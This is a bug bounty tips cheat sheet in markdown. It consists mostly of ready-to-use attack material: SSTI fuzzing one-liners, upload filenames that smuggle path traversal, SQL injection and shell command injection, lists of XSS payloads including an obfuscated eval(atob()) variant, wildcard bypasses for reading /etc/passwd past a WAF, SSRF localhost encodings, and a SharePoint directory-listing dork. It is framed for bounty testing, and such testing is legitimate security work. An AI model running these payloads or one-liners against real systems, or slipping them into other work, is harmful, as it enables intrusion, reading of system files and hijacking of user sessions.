tip-file-3.md

Bug Bounty Tips File -3

SSTI to RCE oneliner check

 waybackurls http://target.com | qsreplace "abc{{9*9}}" > fuzz.txt
 ffuf -u FUZZ -w fuzz.txt -replay-proxy http://127.0.0.1:8080/

waybackurls https://abc.com | grep '=' | qsreplace "abc{{9*9}}"  | httpx -match-regex 'abc81' -threads 300 -http-proxy http://127.0.0.1:8080/

search: abc81 in burpsuite search and check

Chaining file uploads with other vulns:-

Set filename to:- ../../../tmp/lol.png for path traversals sleep(10)-- -.jpg for SQLi. <svg onload=alert(document.comain)>.jpg/png for xss ; sleep 10; for command injections

Extract urls,srcs and hrefs from all HTML elements in any website

Open DevTools and run

urls = []
$$('*').forEach(element => {
  urls.push(element.src)
  urls.push(element.href)
  urls.push(element.url)
}); console.log(...new Set(urls))

XSS

XSS Oneliner

gospider -a -s abc.com -t 3 -c 100 |  tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>'

XSS Payloads for short length inputs

<script src=//⑮.₨></script>

XSS Payloads

 img{background-image:url('javascript:alert()')}
 <svg/onload=eval(atob('YWxlcnQoJ1hTUycp'))> 

Stored XSS Payloads

<img src=`xx:xx`onerror=alert(1)>
<div/onmouseover='alert(1)'> style="x:">
\";alert('XSS');//
"autofocus/onfocus=alert(1)//
'-alert(1)-'

WAF Bypass

WAF restriction? Use these:

/etc/passwd 
/e?c/?asswd
/e*c/*asswd
/??c/?asswd
/??c/?assw?

SSRF Localhost Access Bypass

0
127.00.1
127.0.01
0.00.0
0.0.00
127.1.0.1
127.10.1
127.1.01
0177.1
0177.0001.0001
0x0.0x0.0x0.0x0
0000.0000.0000.0000
0x7f.0x0.0x0.0x1
0177.0000.0000.0001
0177.0001.0000..0001
0x7f.0x1.0x0.0x1
0x7f.0x1.0x1

When you are testing sharepoint applications check this file path that sometimes leads to directory listing:

/_layouts/mobile/view.aspx
Google dork: /_layouts/mobile/view.aspx